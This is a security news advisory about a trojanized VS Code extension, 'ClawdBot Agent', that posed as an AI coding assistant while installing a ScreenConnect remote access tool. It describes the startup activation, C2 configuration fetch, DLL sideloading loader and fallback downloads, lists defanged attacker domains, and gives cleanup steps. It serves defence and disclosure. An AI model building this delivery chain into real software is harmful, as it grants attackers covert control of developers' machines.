A malicious Visual Studio Code extension posing as an AI coding assistant has been caught secretly installing a fully functional remote access tool (RAT) on developer machines.
The extension looks convincing at first glance: polished branding, a professional icon, and integration with several AI providers including OpenAI, Anthropic, Google, Ollama, Groq, Mistral, and OpenRouter.
In reality, it was a trojan that weaponized ConnectWise ScreenConnect for stealthy remote control.
The assistant capabilities actually work, which helps the attacker avoid immediate suspicion from users.
On January 27, 2026, a VS Code extension named “ClawdBot Agent” appeared on the Marketplace, pretending to be an official integration for the viral AI assistant Clawdbot.
Under the hood, however, the extension is built to run as soon as VS Code starts. Its package.json specifies:
json"activationEvents": ["onStartupFinished"]
This ensures the extension activates automatically at startup with no user interaction. The activate() function immediately calls initCore() before any of the “legitimate” AI assistant logic executes.
That initCore() routine contacts a command-and-control (C2) server at http://clawdbot.getintwopc[.]site/config.json, parses a configuration file, and, if enabled, silently downloads and executes additional binaries.
Errors are quietly suppressed in an empty catch block, and a fallback routine kicks in if the primary C2 fails.
The retrieved config.json lists a set of files that closely resemble a packaged Electron application, including Code.exe, multiple DLLs, and support files. At first glance it looks like a trojanized VS Code build.
Static and sandbox analysis, however, show that Code.exe is in fact a legitimate ConnectWise ScreenConnect client, flagged by multiple security vendors as a remote administration tool. When run, it installs to:
C:Program Files (x86)ScreenConnect Client (083e4d30c7ea44f7)
and deploys standard ScreenConnect components such as ScreenConnect.ClientService.exe and ScreenConnect.WindowsBackstageShell.exe. It then connects to:
meeting.bulletmailer[.]net:8041
The abuse lies entirely in the configuration. The embedded ScreenConnect settings hardcode meeting.bulletmailer[.]net as the relay server and include an RSA public key that ties victims directly to the attacker’s infrastructure.
This “Bring Your Own ScreenConnect” approach leverages a trusted remote support tool to bypass many defenses that would typically flag custom RATs.
The attackers also ship a malicious DWrite.dll, detected as a trojanized 64‑bit DLL injector. It is written in Rust, exports the legitimate DWriteCreateFactory symbol, and is designed for DLL sideloading. When loaded, it uses WinINet APIs to download a second-stage payload from a Dropbox URL masquerading as a Zoom update (zoomupdate.msi).
The downloaded MSI shares the same hash as Code.exe, confirming it is the same ScreenConnect installer delivered via a different path.
This makes DWrite.dll a redundant loader: if the primary C2 or delivery path fails, the Dropbox-hosted payload keeps the operation alive.
Additional fallbacks include hardcoded HTTP download URLs and even a PowerShell-based batch script that pulls “Lightshot.exe” from a separate domain, darkgptprivate[.]com.
This multi-layered design dynamic config, JavaScript fallback, PowerShell script, Dropbox-based loader, DLL sideloading, and a trusted remote support tool gives the attackers high resilience against takedowns and analysis.
Users who installed the “ClawdBot Agent” extension should act immediately:
- Remove the “ClawdBot Agent” extension from VS Code.
- Look for ScreenConnect at
C:Program Files (x86)ScreenConnect Client (083e4d30c7ea44f7)and uninstall it. - In Services, stop and remove any “ScreenConnect Client (083e4d30c7ea44f7)” entries.
- Delete
%TEMP%Lightshotif present. - In Task Manager, investigate any unexpected
Code.exeor ScreenConnect processes, especially running from temporary or non-standard paths. - Block
meeting.bulletmailer[.]net,clawdbot.getintwopc[.]site,darkgptprivate[.]com, and associated IPs at the network perimeter; monitor for outbound connections on port 8041. - Run a full antivirus scan.
- Rotate any API keys (OpenAI, Anthropic, Google, etc.) entered into the extension.
- Review scheduled tasks, startup entries, and persistence mechanisms related to ScreenConnect or suspicious binaries.
Microsoft has now removed the malicious extension from the VS Code Marketplace, but any system where it was installed should be treated as potentially compromised with full remote access granted to the attacker.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.